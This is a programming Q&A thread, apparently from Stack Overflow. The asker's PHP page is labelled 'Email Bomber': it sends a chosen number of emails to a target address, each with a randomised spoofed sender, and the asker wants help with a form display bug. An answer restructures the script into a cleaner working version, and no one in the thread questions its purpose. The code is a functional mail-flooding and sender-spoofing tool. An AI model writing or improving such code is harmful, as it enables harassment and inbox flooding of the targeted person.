# Keep my form when echoing

Tags: php, html, echo

For some reason whenever this script get's execited to the point where it is suppose to echo out "IT WORKED!", the message displays but the form that is suppose to be above it disapears.

My Code:

```
<?php

    $message    = $_REQUEST['message'];
    $email      = $_REQUEST['email'];
    $times      = $_REQUEST['times'];
    $subject    = $_REQUEST['subject'];
    $to         = $_REQUEST['to'];

    for ($i=1; $i<=$times; $i++) {
        mail( "$to", "$subject", $message, "From:" . rand() . "@$email" ) ;
    }

?>

    <form method="POST" id="email">

        <h1>Email Bomber</h1>

        <fieldset id="inputs">
            <input name="times" type="text" placeholder="How Many Emails" autofocus required>
            <input name="email" type="text" placeholder="Email Suffix" autofocus required> 
            <input name="to" type="email" placeholder="Who Do You Want To Email" autofocus required> 
            <input name="subject" type="text" placeholder="Email Subject" autofocus required> 
            <textarea name="message" placeholder="The Email Message" rows="15" cols="40"></textarea>
        </fieldset>

        <fieldset id="actions">
            <input type="submit" id="submit" name="Send" value="Send Email">
        </fieldset>
    </form>

    <?php

        if (isset($_REQUEST['message'])) {

            echo "IT WORKED!";

        }

    ?>
```

Comment: Is this the entire content of the script, or is it embedded in another page? Are you POSTing to this?

Comment: Aside from a stylsheet, this is all. And yes, I am use POST with REQUESTS commands to retrieve the data.

Comment: So there is an HTML page that this script is embedded into?

Comment: Well, it's a page that has both HTML & PHP on it.

Answer (score 0):

Should be :

PHP code :

```
<?php
if (isset($_REQUEST['Send'])) {

$message    = $_REQUEST['message'];
$email      = $_REQUEST['email'];
$times      = $_REQUEST['times'];
$subject    = $_REQUEST['subject'];
$to         = $_REQUEST['to'];

for ($i=1; $i<=$times; $i++) {
    mail( "$to", "$subject", $message, "From:" . rand() . "@$email" ) ;
}

echo "IT WORKED!";
}
?>
```

HTML :

```
<form method="POST" id="email" action="#">

    <h1>Email Bomber</h1>

    <fieldset id="inputs">
        <input name="times" type="text" placeholder="How Many Emails" autofocus required>
        <input name="email" type="text" placeholder="Email Suffix" autofocus required> 
        <input name="to" type="email" placeholder="Who Do You Want To Email" autofocus required> 
        <input name="subject" type="text" placeholder="Email Subject" autofocus required> 
        <textarea name="message" placeholder="The Email Message" rows="15" cols="40"></textarea>
    </fieldset>

    <fieldset id="actions">
        <input type="submit" id="submit" name="Send" value="Send Email">
    </fieldset>
</form>
```

Comment: How would go about putting the "IT WORKED!" text below the form?

Comment: as i know when mail is send you want display this message m i right ?

Comment: Didn't really understand what you said. What I want to do is make it so when the form is filled out and it's at the stage where the text "IT WORKED!" would be displayed, I want to have that below the form as a success type message.

Comment: Ohhh means after all field filled out at last you want display this message before submit form , and if you really like that u need to use javascript or jquery function. because using php without submit form you cant get message.

Comment: have you used jquery in your page ?